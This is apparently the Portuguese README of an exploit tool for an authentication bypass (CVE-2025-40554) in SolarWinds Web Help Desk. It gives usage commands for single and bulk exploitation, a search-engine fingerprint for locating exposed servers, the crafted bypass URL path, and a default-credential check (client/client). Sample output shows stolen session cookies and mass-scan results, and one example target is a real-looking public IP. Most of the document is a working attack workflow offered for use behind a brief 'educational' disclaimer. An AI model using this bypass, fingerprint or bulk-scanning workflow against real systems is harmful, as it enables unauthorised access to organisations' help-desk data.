
CVE-2025-40554 Exploitation
Uma ferramenta abrangente de teste de segurança para detectar e explorar a vulnerabilidade de bypass de autenticação (CVE-2025-40554 / CVE-2025-40536) no SolarWinds Web Help Desk.
APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS
Esta ferramenta é fornecida para pesquisa de segurança, testes de penetração e avaliação de vulnerabilidades em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal. Os autores não são responsáveis pelo uso indevido ou por danos causados por esta ferramenta.
CVE-2025-40554 é uma vulnerabilidade crítica de bypass de autenticação no SolarWinds Web Help Desk que permite que atacantes não autenticados:
Verifique por conta própria :))
Dependências:
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Make executable
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443
# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt
# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit
# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q
# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Authentication Bypass Exploitation Tool ║
║ Research & Educational Purposes Only ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789
[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!
[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!
======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================
[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!
[*] Session Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled
[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!
[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed
...
======================================================================
SCAN SUMMARY
======================================================================
Total scanned: 5/5
Vulnerable: 2
With def. creds: 1
======================================================================
[+] Results saved to: vulnerable_targets.txt
Estabelecimento de Sessão
Bypass de Autenticação
Teste de Credenciais (opcional)
Exploração Completa (modo --exploit)
A ferramenta detecta o bypass bem-sucedido verificando:
externalAuthContainer - configuração de autenticação externaJSONRpcClient - exposição do cliente de APISAML 2.0 - configuração de SSOLoginPref - configurações de preferência de loginauthMode - configurações do modo de autenticaçãoContribuições são bem-vindas.....
Esta ferramenta é fornecida "como está", sem garantia de qualquer tipo. Use por sua conta e risco.
Skynoxk
Lembre-se: Sempre hackeie de forma ética e legal. O acesso não autorizado é um crime.
| Option | Description |
|---|
-t, --target URL | URL do alvo único a testar |
-l, --list FILE | Arquivo contendo lista de alvos (um por linha) |
--exploit | Ativa o modo de exploração completo com enumeração |
--no-login | Pula o teste de credenciais padrão |
-o, --output FILE | Arquivo de saída para alvos vulneráveis (padrão: vulnerable_targets.txt) |
-q, --quiet | Modo de saída mínima (útil para varreduras em massa) |